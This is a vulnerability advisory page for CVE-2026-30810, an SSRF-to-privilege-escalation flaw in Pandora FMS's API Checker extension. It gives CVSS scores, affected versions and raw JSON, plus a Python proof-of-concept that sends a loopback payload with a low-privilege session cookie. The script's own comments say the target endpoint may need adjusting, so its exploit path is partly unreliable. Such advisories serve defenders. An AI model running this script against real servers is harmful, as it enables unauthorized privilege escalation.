Security Vulnerability Report
中文
CVE-2026-30810 CVSS 8.8 HIGH

CVE-2026-30810

Published: 2026-05-12 16:16:13
Last Modified: 2026-05-13 14:37:34

Description

Server-Side Request Forgery vulnerability allows Privilege Escalation via API Checker extension. This issue affects Pandora FMS: from 777 through 800

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* - VULNERABLE
Pandora FMS 777
Pandora FMS 800

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_poc(target_url, session_cookie): """ PoC for CVE-2026-30810: SSRF in Pandora FMS API Checker """ # The endpoint for the API Checker extension api_checker_url = f"{target_url}/pandora_console/index.php?sec=extensions&sec2=extensions/api_checker" # Internal target to access (e.g., local admin panel or metadata service) # Adjust this payload based on the specific internal endpoint that grants privilege escalation ssrf_payload = "http://127.0.0.1/pandora_console/index.php?sec=workspace&sec2=godmode/admin_access/manage" headers = { "Cookie": f"PHPSESSID={session_cookie}" } data = { "url": ssrf_payload, "submit": "Check" } try: print(f"[*] Sending SSRF request to {target_url}...") response = requests.post(api_checker_url, data=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if privilege escalation occurred.") print("[+] Response snippet:") print(response.text[:500]) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target and low-priv session TARGET = "http://192.168.1.100" SESSION = "attacker_session_id_here" exploit_poc(TARGET, SESSION)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30810", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:13.130", "lastModified": "2026-05-13T14:37:34.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery vulnerability allows Privilege Escalation via API Checker extension. This issue affects Pandora FMS: from 777 through 800"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:C/RE:M/U:Amber", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*", "versionEndExcluding": "777.17", "matchCriteriaId": "5C766DC3-16B3-4309-A112-DB507EF65281"}, {"vulnerable": true, "criteria": "cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*", "versionStartIncluding": "778", "versionEndExcluding": "802", "matchCriteriaId": "F121594D-F900-4C2C-B909-4B5434709736"}]}]}], "references": [{"url": "https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}